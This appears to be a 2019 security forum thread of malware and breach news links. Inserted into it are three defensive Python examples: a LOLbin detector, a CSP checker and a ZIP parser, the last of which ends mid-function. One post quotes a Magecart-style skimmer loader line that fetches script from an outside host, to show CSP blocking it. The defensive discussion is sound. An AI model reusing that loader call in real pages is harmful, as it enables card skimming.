A lot of malware lurks in google searches, some even have the brass neck to pay for search placement on specific search words/terms or have sponsored links. Google really need to be more proactive in rooting out the possibly malicious/fraudulent sponsored links or search placement.
That's the reason (for me) for not using google search.
That's one of the reason you should be using the Avast Online Security extension. :)
-
Bob3160 is 100% right. Do use the pro-active blocking via Avast Secure Browsing,
to stop, for instance, abuse campaigns like those from so-called free-trade scam platforms.
It also stops abuse scripts from here: -https://3v4l.org/ an online PHP editor,
which can also be used for nefarious purposes.
This, for instance, was blocked for me: -https://3v4l.org/2CBnj
The abusive script was stopped in its tracks from the word go.
polonus
-
Whenever you own or make use of a Magento 1 or 2 CMS driven webshop,
it is a good thing to check the retirability of your javascript libraries here:
https://retire.insecurity.today/ and your CMS vulnerabilities here: https://www.magereport.com/
Very advanced JavaScript XSS injection code, obfuscated and sometimes no longer than 75 or even 22 sophisticated lines,
is being abused for credit card stealing and other data skimming purposes by members of the cybercriminal Magecart
or Group 11 cyber-criminals.
If you do not pay attention they may rob your credit card clean of all the money.
Re: https://gwillem.gitlab.io/2018/10/23/magecart-extension-0days/
Group 11 or Magecart malcreant developers love to malcreate on the basis of hook.js & bootstrap.js, for instance.
Re: https://www.hybrid-analysis.com/sample/c19270ebf25dd7442462159dd371a6830815d3202cdc896690885c2e46509d86?environmentId=100
This is helped by the fact there are so many PHISHING sites around for their evil-doing and also server weaknesses like BeEF, etc.
Background read: https://www.riskiq.com/blog/labs/magecart-vision-direct/
polonus (volunteer 3rd party website security analyst and website error-hunter)
-
New ServHelper Backdoor and FlawedGrace RAT Pushed by Necurs Botnet
https://www.bleepingcomputer.com/news/security/new-servhelper-backdoor-and-flawedgrace-rat-pushed-by-necurs-botnet/
-
Fake Movie File Infects PC to Steal Cryptocurrency, Poison Google Results
https://www.bleepingcomputer.com/news/security/fake-movie-file-infects-pc-to-steal-cryptocurrency-poison-google-results/
-
Eight months after discovery, unkillable LoJax rootkit campaign remains active
https://arstechnica.com/information-technology/2019/01/8-months-after-its-discovery-unkillable-lojax-rootkit-campaign-remains-active/
-
New Magecart Attack Delivered Through Compromised Advertising Supply Chain
https://blog.trendmicro.com/trendlabs-security-intelligence/new-magecart-attack-delivered-through-compromised-advertising-supply-chain/
Skimming script
https://www.virustotal.com/#/file/80e40051baae72b37fee49ecc43e8dded645b1baf5ce6166c96a3bcf0c3582ce/detection
https://www.virustotal.com/#/file/87ee0ae3abcd8b4880bf48781eba16135ba03392079a8d78a663274fde4060cd/detection
https://www.virustotal.com/#/file/f1f905558c1546cd6df67504462f0171f9fca1cfe8b0348940aad78265a5ef73/detection
https://www.virustotal.com/#/file/56cca56e39431187a2bd95e53eece8f11d3cbe2ea7ee692fa891875f40f233f5/detection
-
WordPress warns about servers with old (outdated) PHP versions:
https://make.wordpress.org/core/2019/01/14/php-site-health-mechanisms-in-5-1/ (source credits Felix Arntz);
See for warnings: https://wordpress.org/support/update-php/
Mind back-patching distros for issues.
Read: https://sucuri.net/guides/how-to-clean-hacked-wordpress
Check at https://hackertarget.com/wordpress-security-scan/
Check libraries at https://retire.insecurity.today/#
or at
https://webhint.io/scanner/ at security with Snort Rules.
For PHP version 7 check compatibility at: https://wpengine.com/blog/php-7-compatibility-checker-plugin/
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
A lot of malware lurks in google searches, some even have the brass neck to pay for search placement on specific search words/terms or have sponsored links. Google really need to be more proactive in rooting out the possibly malicious/fraudulent sponsored links or search placement.
That's the reason (for me) for not using google search.
That's one of the reasons you should be using the Avast Online Security extension. :)
(https://screencast-o-matic.com/screenshots/u/Lh/1546656621466-62740.png)
I've been using it for years (see my sig, please). :)
-
Cryptominer removes protection software on Linux servers:
First it disables the cloud monitoring service, uninstalling it the way an admin would.
Malcreants are getting more and more dastardly in their ways.
https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/
polonus
-
I had forgotten how long CryptoLocker has been a part of the scene:
https://forum.avast.com/index.php?topic=19387.msg179783#msg179783
I posted that back in 2006
-
Serious Drupal holes: https://www.us-cert.gov/ncas/current-activity/2019/01/16/Drupal-Releases-Security-Updates
Re: https://www.drupal.org/sa-core-2019-001 and https://www.drupal.org/sa-core-2019-002
And again, at the heart of the problem lies insufficiently validated PHP.
PHP developers, keep your cheat-sheets ready.
Read: https://phpsecurity.readthedocs.io/en/latest/Input-Validation.html
Sometimes file expectations are wrongly interpreted:
https://stackoverflow.com/questions/15943926/php-possible-weaknesses-for-filter-validate-url-fopenurl-r-url-validati
and see other PHP related trouble: https://www.tenable.com/plugins/nessus/17715
polonus
-
Facebook Caught Red Handed While Swiping Money From Children
https://www.bleepingcomputer.com/news/security/facebook-caught-red-handed-while-swiping-money-from-children/
-
Facebook Caught Red Handed While Swiping Money From Children
I'm astonished that a company with such a reputation for integrity, transparency and fair dealing would resort to such practices ;D
-
Magecart hackers rejoice: https://gwillem.gitlab.io/2019/01/17/adminer-4.6.2-file-disclosure-vulnerability/
Check your Magento CMS here: https://www.magereport.com/
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Malcreants adopted a PEAR version that was online for half a year.
Archived phar files are not checked often enough for having been compromised:
Check the repository for the right non-malicious archive: https://github.com/pear
AV should pay more attention to such open source code for being altered and compromised ;)
pol
-
Google is proposing a change to Chrome that would break ad blockers like uBlock Origin
https://9to5google.com/2019/01/22/google-chrome-break-ad-blockers/amp/?__twitter_impression=true
-
Google is proposing a change to Chrome that would break ad blockers like uBlock Origin
https://9to5google.com/2019/01/22/google-chrome-break-ad-blockers/amp/?__twitter_impression=true
Interesting, I already avoid Google Chrome (wherever possible; the one exception is Android mobile) and this certainly isn't going to get me to install it.
I just wonder how this would impact ASB as it is based on Chromium, assuming that ASB and Avast allow the uBlock Origin add-on to be installed.
-
No-Name-Smart-Home: Security flaw allows easy firmware upload
https://www.heise.de/newsticker/meldung/No-Name-Smart-Home-Security-flaw-allows-easy-firmware-upload-4285085.html
-
New Ursnif Malware Campaign Uses Fileless Infection to Avoid Detection
https://www.bleepingcomputer.com/news/security/new-ursnif-malware-campaign-uses-fileless-infection-to-avoid-detection/
-
WordPress websites hijacked via zero-day in plug-in:
https://www.wordfence.com/blog/2019/01/wordpress-sites-compromised-via-zero-day-vulnerabilities-in-total-donations-plugin/
polonus
-
Dailymotion subject to a computer attack
https://press.ondailymotion.com/en/dailymotion-subject-to-a-computer-attack/
-
Discover Card Users Affected by Data Breach, New Credit Cards Issued
https://www.bleepingcomputer.com/news/security/discover-card-users-affected-by-data-breach-new-credit-cards-issued/
-
Another very misleading topic that makes it appear that the Discover Card system was breached. It was not.
-
https://www.engadget.com/2019/01/30/google-chrome-lookalike-url-warning/
-
https://www.engadget.com/2019/01/30/google-chrome-lookalike-url-warning/
A feature that has been part of the Avast AOS for a very long time.
-
Facebook Moves to Block Ad Transparency Tools
https://www.propublica.org/article/facebook-blocks-ad-transparency-tools
-
Backdoored cryptocurrency software found serving AZORult malware
https://www.zdnet.com/article/backdoored-cryptocurrency-software-found-serving-azorult-malware/
-
IcedID banking trojan now used against online retailers
https://www.scmagazine.com/home/security-news/malware/icedid-banking-trojan-now-used-against-online-retailers/
-
Phishing campaign targeted subscribers to Tibetan Government-in-Exile’s mailing list
https://www.scmagazine.com/home/security-news/phishing-campaign-targeted-subscribers-to-tibetan-government-in-exiles-mailing-list/
-
620 million accounts stolen from 16 hacked websites now for sale on dark web, seller boasts
https://www.theregister.co.uk/2019/02/11/620_million_hacked_accounts_dark_web/
-
Chip and PIN protections may fall short as future threats materialize
https://www.scmagazine.com/home/security-news/chip-and-pin-protections-may-fall-short-as-future-threats-materialize/
-
Dirty Sock vulnerability lets attackers gain root access on Linux systems
https://www.zdnet.com/article/dirty-sock-vulnerability-lets-attackers-gain-root-access-on-linux-systems/
-
Hackers wipe US servers of email provider VFEmail
https://www.zdnet.com/article/hackers-wipe-us-servers-of-email-provider-vfemail/
-
Surprised, I haven't seen Avast make any statement regarding this.
This Trojan exploits antivirus software to steal your data
https://www.zdnet.com/article/this-new-malware-exploits-bugs-in-antivirus-software-to-steal-your-data/
This version injects a malicious module into one of Avast's processes, whereas early versions of the campaign detected Avast and quit. As Avast is the most common antivirus software in the world, this is an effective evasive strategy.
aswrundll.exe is the Avast Software Runtime Dynamic Link Library that is responsible for running modules for Avast. aswrundll.exe is very similar to Microsoft’s own rundll32.exe - it allows one to execute DLLs by calling their exported functions. The use of aswrundll.exe as a LOLbin has been mentioned in the past year.
https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil
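An added detection example, not code from the Cybereason report or from Avast: a review of process-creation events that flags aswrundll.exe launches which do not look like Avast's own use of the binary. The Avast install directory, the event field names and the sample events are assumptions constructed for the example, and the three checks are heuristics, not documented Avast behaviour.

```python
import ntpath
import shlex

# Assumed default Avast install directory (an assumption for this example; set it to the real path).
AVAST_DIR = r"c:\program files\avast software\avast"
LOLBIN = "aswrundll.exe"


def _in_avast_dir(path):
    """True when a Windows path lies inside the Avast program directory (case-insensitive)."""
    return ntpath.normpath(path).lower().startswith(AVAST_DIR + "\\")


def _argument_paths(command_line):
    """Path-like arguments of a Windows command line, excluding the executable itself."""
    tokens = shlex.split(command_line, posix=False)[1:]
    return [t.strip('"') for t in tokens if "\\" in t]


def review_event(event):
    """Heuristic checks for one process-creation event (fields modelled on Sysmon Event ID 1).
    Returns the reasons the launch looks like misuse; an empty list means nothing stood out."""
    if ntpath.basename(event["image"]).lower() != LOLBIN:
        return []
    reasons = []
    if not _in_avast_dir(event["image"]):
        reasons.append("aswrundll.exe running from outside the Avast directory")
    if not _in_avast_dir(event["parent_image"]):
        reasons.append("parent is not an Avast process: " + ntpath.basename(event["parent_image"]))
    for path in _argument_paths(event["command_line"]):
        if not _in_avast_dir(path):
            reasons.append("module argument outside the Avast directory: " + path)
    return reasons


def triage(events):
    """Map event id -> reasons for every aswrundll.exe launch that trips at least one check."""
    findings = {}
    for event in events:
        reasons = review_event(event)
        if reasons:
            findings[event["id"]] = reasons
    return findings


# Constructed sample events, not real telemetry. Event 1 is the routine case; event 2 is the
# pattern described above (a copy of the trusted binary made to load a foreign module).
SAMPLE_EVENTS = [
    {"id": 1,
     "image": r"C:\Program Files\Avast Software\Avast\aswrundll.exe",
     "parent_image": r"C:\Program Files\Avast Software\Avast\AvastSvc.exe",
     "command_line": r'"C:\Program Files\Avast Software\Avast\aswrundll.exe" '
                     r'"C:\Program Files\Avast Software\Avast\defs\sample.dll"'},
    {"id": 2,
     "image": r"C:\Users\Public\aswrundll.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'"C:\Users\Public\aswrundll.exe" "C:\Users\Public\Libraries\update.dll"'},
    {"id": 3,
     "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}:", *reasons, sep="\n  ")
```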
-
Thanks, I forwarded it...
-
Thanks, I forwarded it...
Thank you.
https://www.bleepingcomputer.com/news/security/new-astaroth-trojan-variant-exploits-anti-malware-software-to-steal-info/
Update February 13 2019 20:00 EST: Article updated post-publication with additional comments from Avast:
We learned today about this particular Astaroth trojan variant analyzed in Cybereason’s report. Since this is not an exploit, there is no obligation for them to provide formal or advance communication. The authors misuse a trusted binary to run the malware, in this case they used an Avast process, probably due to the size of our user base in the target country of Brazil. One important thing to consider is that this is neither an injection nor a privilege escalation. Installed Avast binaries have self-protection mechanisms in place to avoid injections. In this instance, they are using an Avast file to run a binary in a similar way that a DLL using Windows’ rundll32.exe can run. We had previously issued a detection for the malware so all Avast users are protected from this variant. Additionally, we will be implementing changes to our environment to ensure the same process cannot be misused in this way in the future.
Hoping that Avast's aswrundll.exe is protected by Avast and has a self-protection mechanism too.
-
DNS Infrastructure Hijacking Campaign (Updated: 13, 2019)
https://www.us-cert.gov/ncas/alerts/AA19-024A
https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/
-
Hacked USB Cable
(https://screencast-o-matic.com/screenshots/u/Lh/1550175417892-81108.png)
https://youtu.be/uFcWlqQIOIY
-
Hacked USB Cable
(https://screencast-o-matic.com/screenshots/u/Lh/1550175417892-81108.png)
https://youtu.be/uFcWlqQIOIY
Very sneaky and scary and how to tell.
-
You can read more about it here,
https://www.pcmag.com/news/366478/evil-usb-cable-can-remotely-accept-commands-from-hacker?utm_source=email&utm_campaign=whatsnewnow&utm_medium=title
I put the video together for my next presentation. (2020)
-
Emotet Uses Camouflaged Malicious Macros to Avoid Antivirus Detection
https://www.bleepingcomputer.com/news/security/emotet-uses-camouflaged-malicious-macros-to-avoid-antivirus-detection/
-
Ransomware attackers exploit old plug-in flaw to infect MSPs and their clients
https://www.scmagazine.com/home/security-news/ransomware-attackers-exploit-old-plug-in-flaw-to-infect-msps-and-their-clients/
-
https://selabs.uk/en/reports/consumers
-
https://selabs.uk/en/reports/consumers
What I instantly noticed is Defender's rating.
Hope Avast is also paying attention.
-
https://selabs.uk/en/reports/consumers
What I instantly noticed is Defender's rating.
Hope Avast is also paying attention.
+1
-
https://selabs.uk/en/reports/consumers
What I instantly noticed is Defender's rating.
Hope Avast is also paying attention.
Avira Free also ahead of avast!
What is Avast doing? ???
-
Avira Free also ahead of avast!
What is Avast doing? ???
All good anti-viruses are very close in protection, so it's not strange.
-
Avira Free also ahead of avast!
What is Avast doing? ???
All good anti-viruses are very close in protection, so it's not strange.
See PROTECTION ACCURACY: only 80%
-
Looking at those topic titles, they don't make sense to me.
What is the difference between 'Protection Accuracy' and 'Legitimate Accuracy'?
And then there is this 'Total Accuracy', where there is some sort of fudge factor to come up with 'Total Accuracy'?
Surely we should only be concerned with Protection Accuracy, whatever that means.
It also seems strange with different results for AVG.
-
It is unwise to give Starbucks your real name:
https://www.welivesecurity.com/2019/02/13/why-you-should-choose-pseudonym-at-starbucks/
polonus
-
New free decryption tool for GandCrab malware to be downloaded here:
https://www.nomoreransom.org/
New GandCrab URI: https://urlhaus.abuse.ch/url/139738/
10 to detect: https://www.virustotal.com/#/url/988d3f525646c4e72d171cee3a8ba5da1595fc2edb14df0602c2d0f0032ff033/detection
polonus (volunteer website security analyst and website error-hunter)
-
Another unpatched hole in WordPress CMS and via vulnerable plug-ins:
https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
polonus
-
Microsoft Edge Secret Whitelist Allows Facebook to Autorun Flash
https://www.bleepingcomputer.com/news/security/microsoft-edge-secret-whitelist-allows-facebook-to-autorun-flash/
-
Security Updates available for Adobe Acrobat and Reader | APSB19-13
https://helpx.adobe.com/security/products/acrobat/apsb19-13.html
-
New browser attack lets hackers run bad code even after users leave a web page
https://www.zdnet.com/article/new-browser-attack-lets-hackers-run-bad-code-even-after-users-leave-a-web-page/
-
PDF signature-spoofing
Read: https://www.pdf-insecurity.org/
polonus
-
Fake mobile CCleaner app sneaked into the China Baidu app store.
https://blog.avast.com/fake-mobile-ccleaner-app-tricking-users
-
StealthWorker Malware Uses Windows, Linux Bots to Hack Websites
https://www.bleepingcomputer.com/news/security/stealthworker-malware-uses-windows-linux-bots-to-hack-websites/
-
New LockerGoga Ransomware Allegedly Used in Altran Attack
https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/
-
PHP-based CMS, it may be a continuous can of worms...
WordPress webshops attacked through another plug-in security hole:
Read: https://wordpress.org/plugins/woocommerce-abandoned-cart/
and https://www.wordfence.com/blog/2019/03/xss-flaw-in-abandoned-cart-plugin-leads-to-wordpress-site-takeovers/
Also worthwhile to scan with: https://hackertarget.com/wordpress-security-scan/
and https://webhint.io/scanner/
but first things first - update, update and patch always,
polonus
-
For security specialists only, using reverse engineering for ethical pentesting purposes.
JavaScript being sort of my kettle of fish is what brought me to dive into some of the minor issues below.
So I have to give out some form of warning to be careful with the use of unsupported bootstrap.js open modals
in combination with exploitable Kafka Manager, for instance, or Hadoop, without considering such weaknesses.
Read: https://snyk.io/vuln/npm:bootstrap (mainly unpatched).
Undefined serialization issues on particular reverse engineering tools, like the just released Ghidra tool.
Re: https://www.virustotal.com/#/url/f30aa74b8135eb48a06a0a86dda19853fc9f3d6d9c7ce871af21c25781ebaa56/detection
So researchers who decide to use such a tool that has recently become available should be aware of possible issues
with for instance "unsupported-bootstrap-f18e970de8731748.js" and several DNS pre-fetches involved.
Also consider for bootstrap.js: https://github.com/twbs/bootstrap/pull/28236
polonus (volunteer website security analyst and website error-hunter)
-
Phishing scam fakes Facebook
https://blog.avast.com/ios-phishing-scam-steals-facebook-logins
-
Malicious Counter-Strike 1.6 servers used zero-days to infect users with malware
https://www.zdnet.com/article/malicious-counter-strike-1-6-servers-used-zero-days-to-infect-users-with-malware/
Dr.Web report > pdf.doc https://st.drweb.com/static/new-www/news/2019/march/belonard_trojan_en.pdf
-
Intel Fixes High Severity Vulnerabilities in Graphics Driver for Windows
https://www.bleepingcomputer.com/news/security/intel-fixes-high-severity-vulnerabilities-in-graphics-driver-for-windows/
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00189.html
-
Many webshops fall victim to form-jacking
Think of the Magecart campaign and, recently:
https://www.group-ib.com/media/js-sniffer/
Payment data of thousands of customers of UK and US online stores could have been compromised.
It is loading the script from gmo.li using a jQuery getScript call, so a properly constructed CSP would have blocked it. Tested using one of my own CSP-protected sites. See the result here:
$.getScript('hxtp://gmo.li/js.php?r=008353')
Content Security Policy: The page’s settings blocked the loading of a resource at hxtp://gmo.li/js.php?r=008353&_=1552623429549 (“default-src”).
Implementing CSP on someone else's code would be really tough.
info credits go to foxonsafari.
polonus
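As an added example (not code from the post or from foxonsafari), the check a browser performs before fetching a script, reduced to a small evaluator: given a Content-Security-Policy header and the URL that `$.getScript` would request, it reports whether the load would go through. The shop origin and the CDN hosts are assumed names; the sniffer URL is the one quoted in the post. It also shows why a bare `*` or a plain `https:` source would not have helped.

```python
from urllib.parse import urlparse

DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_csp(header):
    """Turn a Content-Security-Policy header value into {directive: [source expressions]}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.strip().split()
        if parts:
            policy.setdefault(parts[0].lower(), parts[1:])  # a repeated directive is ignored
    return policy


def _port_of(url):
    return url.port or DEFAULT_PORTS.get(url.scheme)


def _host_matches(pattern, host):
    if pattern == "*":
        return True
    if pattern.startswith("*."):  # "*.example" covers sub-domains, not "example" itself
        return host.endswith(pattern[1:])
    return pattern == host


def _source_allows(expr, target, page):
    """Does one source expression permit fetching `target` from a page at `page`?"""
    if expr.startswith("'"):
        # 'self' is the only keyword that can permit a remote fetch; 'none', nonces,
        # hashes and 'unsafe-inline' say nothing about URLs and so allow none of them
        return (expr.lower() == "'self'" and target.scheme == page.scheme
                and target.hostname == page.hostname and _port_of(target) == _port_of(page))
    if expr == "*":  # bare wildcard: any network scheme, which is why it offers no protection
        return target.scheme in ("http", "https", "ws", "wss")
    if expr.endswith(":") and "/" not in expr:  # scheme source such as "https:"
        return target.scheme == expr[:-1].lower()
    # host source: [scheme://]host[:port][/path]; the path part is ignored here
    scheme, rest = expr.split("://", 1) if "://" in expr else (None, expr)
    host, _, port = rest.split("/", 1)[0].partition(":")
    wanted = (scheme or page.scheme).lower()
    if target.scheme != wanted and not (wanted == "http" and target.scheme == "https"):
        return False  # an http source may match https, never the other way round
    if not _host_matches(host.lower(), target.hostname or ""):
        return False
    if port and port != "*" and int(port) != _port_of(target):
        return False
    return True


def script_allowed(csp_header, script_url, page_origin):
    """True if a page served with csp_header may load script_url, e.g. via $.getScript()."""
    policy = parse_csp(csp_header)
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return True  # no governing directive, so the browser applies no restriction
    target, page = urlparse(script_url), urlparse(page_origin)
    return any(_source_allows(s, target, page) for s in sources)


# Constructed scenario mirroring the post above: an assumed shop page loading the sniffer URL.
SHOP = "https://shop.example"
SNIFFER = "http://gmo.li/js.php?r=008353"

if __name__ == "__main__":
    for csp in ("default-src 'self'", "script-src *", "script-src https:",
                "default-src 'self'; script-src 'self' https://cdn.example"):
        print(f"{csp!r:60} allows sniffer: {script_allowed(csp, SNIFFER, SHOP)}")
```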
-
One of the biggest aluminium producers hit by ransomware.
https://newsweb.oslobors.no/message/472389
Various factories inside EU and USA have been hit:
https://www.nrk.no/norge/hydro-utsatt-for-dataangrep_-_--ikke-opplevd-lignende-1.14479736
Norse Security Services are investigating:
https://twitter.com/NSM_no/status/1107945689491931137
polonus
-
One of the biggest aluminium producers hit by ransomware.
https://newsweb.oslobors.no/message/472389
Various factories inside EU and USA have been hit:
https://www.nrk.no/norge/hydro-utsatt-for-dataangrep_-_--ikke-opplevd-lignende-1.14479736
Norse Security Services are investigating:
https://twitter.com/NSM_no/status/1107945689491931137
polonus
In English https://www.newsinenglish.no/2019/03/19/hydro-comes-under-major-cyber-attack/
-
One of the biggest aluminium producers hit by ransomware.
https://newsweb.oslobors.no/message/472389
Various factories inside EU and USA have been hit:
https://www.nrk.no/norge/hydro-utsatt-for-dataangrep_-_--ikke-opplevd-lignende-1.14479736
Norse Security Services are investigating:
https://twitter.com/NSM_no/status/1107945689491931137
polonus
In English https://www.newsinenglish.no/2019/03/19/hydro-comes-under-major-cyber-attack/
If this does nothing else, it should show business has to isolate critical systems and have a robust backup and recovery strategy. Assuming they have an IT department.
-
WordPress sites under attack via vulnerable plug-in: https://wordpress.org/plugins/easy-wp-smtp/#developers
Attacks ongoing since March 15th: https://blog.nintechnet.com/critical-0day-vulnerability-fixed-in-wordpress-easy-wp-smtp-plugin/
Update the plug-in in question: https://www.wordfence.com/blog/2019/03/hackers-abusing-recently-patched-vulnerability-in-easy-wp-smtp-plugin/
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Not sure if this is the correct thread but I am getting warnings on a few sites I manage:
hxxp://best-home-security-systems.com/
hxxps://homesecuritysystems-local.com/
hxxp://californiahomesecuritysystems.com/
The message:
Warning
This site could have harmed your computer
Get me out of here
Any info would be appreciated.
-
Not sure if this is the correct thread but I am getting warnings on a few sites I manage:
hxxp://best-home-security-systems.com/
hxxps://homesecuritysystems-local.com/
hxxp://californiahomesecuritysystems.com/
The message:
Warning
This site could have harmed your computer
Get me out of here
Any info would be appreciated.
Report a URL
https://www.avast.com/report-a-url.php
-
Can Avast detect this?
https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
-
Can Avast detect this?
https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
https://www.virustotal.com/#/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection
Kaspersky https://securelist.com/operation-shadowhammer/89992/
We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack. To check this, it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found.
-
Can Avast detect this?
https://www.tomsguide.com/us/chinese-hackers-asus-kaspersky,news-29722.html
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
https://www.virustotal.com/#/file/bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19/detection
Kaspersky https://securelist.com/operation-shadowhammer/89992/
We’ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack. To check this, it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found.
The simple answer is Yes. I certainly wouldn't suggest downloading a tool from Kaspersky in light of the fact that Avast detects this malware. :)
-
The simple answer is Yes. I certainly wouldn't suggest downloading a tool from Kaspersky in light of the fact that Avast detects this malware. :)
So if an Avast scan is done and the result is clean, it means the computer isn't infected or affected by any of this?
-
Correct. :)
-
Correct. :)
Partly correct
You can still have one of the network adapters listed; you may have one made by Asus even if not running an Asus computer.
-
You can still have one of the network adapters listed; you may have one made by Asus even if not running an Asus computer.
Please explain what you mean.
-
There are two things in combination here:
- the backdoored version of ASUS Live Update
- the network adapters targeted
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
The researchers estimate half a million Windows machines received the malicious backdoor through the ASUS update server, although the attackers appear to have been targeting only about 600 of those systems. The malware searched for targeted systems through their unique MAC addresses. Once on a system, if it found one of these targeted addresses, the malware reached out to a command-and-control server the attackers operated, which then installed additional malware on those machines.
-
There are two things in combination here:
- the backdoored version of ASUS Live Update
- the network adapters targeted
https://motherboard.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers
The researchers estimate half a million Windows machines received the malicious backdoor through the ASUS update server, although the attackers appear to have been targeting only about 600 of those systems. The malware searched for targeted systems through their unique MAC addresses. Once on a system, if it found one of these targeted addresses, the malware reached out to a command-and-control server the attackers operated, which then installed additional malware on those machines.
That malware, if a scan were to be run, would be detected by Avast. It may well be detected without running a scan.
-
ASUS response to the recent media reports regarding ASUS Live Update tool attack by Advanced Persistent Threat (APT) groups
https://www.asus.com/News/hqfgVUyZ6uyAyJe1
https://www.bleepingcomputer.com/news/security/asus-admits-its-live-update-utility-was-backdoored-by-apt-group/
-
Security Bulletin: NVIDIA GeForce Experience – March 2019
https://nvidia.custhelp.com/app/answers/detail/a_id/4784/kw/Security%20Bulletin
-
ASUS Releases Security Update for Live Update Software
https://www.us-cert.gov/ncas/current-activity/2019/03/26/ASUS-Releases-Security-Update-Live-Update-Software
-
ASUS response to the recent media reports regarding ASUS Live Update tool attack by Advanced Persistent Threat (APT) groups
https://www.asus.com/News/hqfgVUyZ6uyAyJe1
https://www.bleepingcomputer.com/news/security/asus-admits-its-live-update-utility-was-backdoored-by-apt-group/
Is this firmware update (which is over two months old) affected by this issue?
-
Toyota announces second security breach in the last five weeks
https://www.zdnet.com/article/toyota-announces-second-security-breach-in-the-last-five-weeks/
-
Vulnerable WordPress CMS websites under constant attack via PHPMYADMIN_WORM
Look at all that worm activity going on: https://viz.greynoise.io/table
Not a cyber-friendly place on that visualizer. Look at this randomly chosen source of infection:
https://www.shodan.io/host/115.68.108.67
WordPress & PHP and also modern languages like Slick.
Net-scans, for instance, with malicious PHPMYADMIN_WORM
scanner functions via PHP/5.6.0
The phar_parse_zipfile function in zip.c in the PHAR extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read and application crash) by placing a PK\x05\x06 signature at an invalid location.
Keep an eye on these forthcoming logs, you cyberdefense folks. WordPress CMS admins, look after your configuration and eventual compromise. You are under constant attack from all corners of the globe.
Do you know what all these crawlers and bad bots are up to all of the time? Time to stop and block them.
Info credits go to J.O.
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
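As an added example (not the PHP code and not from the post), the kind of bounds checking the quoted CVE description is about: a ZIP end-of-central-directory locator that validates every offset and length against the real buffer before using it, so a PK\x05\x06 signature at an invalid location is skipped rather than trusted. The sample archives are constructed in memory with the standard library; nothing here is specific to phar.

```python
import io
import struct
import zipfile

EOCD_SIG, EOCD_LEN = b"PK\x05\x06", 22  # end-of-central-directory record: signature + 18 bytes
CDH_SIG, CDH_LEN = b"PK\x01\x02", 46    # central-directory file header, fixed part
CDH_FMT = "<4sHHHHHHIIIHHHHHII"
MAX_COMMENT = 0xFFFF                    # the archive comment length is a 16-bit field


class MalformedZip(ValueError):
    """Raised instead of ever reading outside the buffer."""


def _eocd_at(data, pos):
    """Validate a candidate EOCD record at pos; return its fields, or None if it cannot be genuine."""
    if pos + EOCD_LEN > len(data):
        return None
    disk, cd_disk, here, total, cd_size, cd_offset, comment_len = struct.unpack(
        "<HHHHIIH", data[pos + 4:pos + EOCD_LEN])
    if pos + EOCD_LEN + comment_len != len(data):  # the comment must run exactly to end of file
        return None
    if cd_offset + cd_size > pos:  # the central directory must lie entirely before this record
        return None
    if disk or cd_disk or here != total:  # multi-disk archives are out of scope here
        return None
    return {"eocd_offset": pos, "cd_offset": cd_offset, "cd_size": cd_size, "entries": total}


def locate_eocd(data):
    """Find the EOCD record by scanning backwards through the window a comment may occupy.
    A signature at an invalid location (inside the comment, or with fields that point outside
    the file) is skipped instead of being trusted, so no offset taken from it is ever used."""
    window_start = max(0, len(data) - EOCD_LEN - MAX_COMMENT)
    end = len(data)
    while True:
        pos = data.rfind(EOCD_SIG, window_start, end)
        if pos < 0:
            raise MalformedZip("no valid end-of-central-directory record")
        record = _eocd_at(data, pos)
        if record:
            return record
        end = pos  # stray or inconsistent signature: keep looking further back


def list_entries(data):
    """Walk the central directory and return the entry names, bounds-checking every step."""
    record = locate_eocd(data)
    pos, end = record["cd_offset"], record["cd_offset"] + record["cd_size"]
    names = []
    for _ in range(record["entries"]):
        if pos + CDH_LEN > end:
            raise MalformedZip("central-directory header runs past the directory")
        fields = struct.unpack(CDH_FMT, data[pos:pos + CDH_LEN])
        if fields[0] != CDH_SIG:
            raise MalformedZip("bad central-directory header signature")
        name_len, extra_len, comment_len, local_offset = fields[10], fields[11], fields[12], fields[16]
        if pos + CDH_LEN + name_len + extra_len + comment_len > end:
            raise MalformedZip("variable-length fields run past the directory")
        if local_offset >= record["cd_offset"]:
            raise MalformedZip("local header offset points past the central directory")
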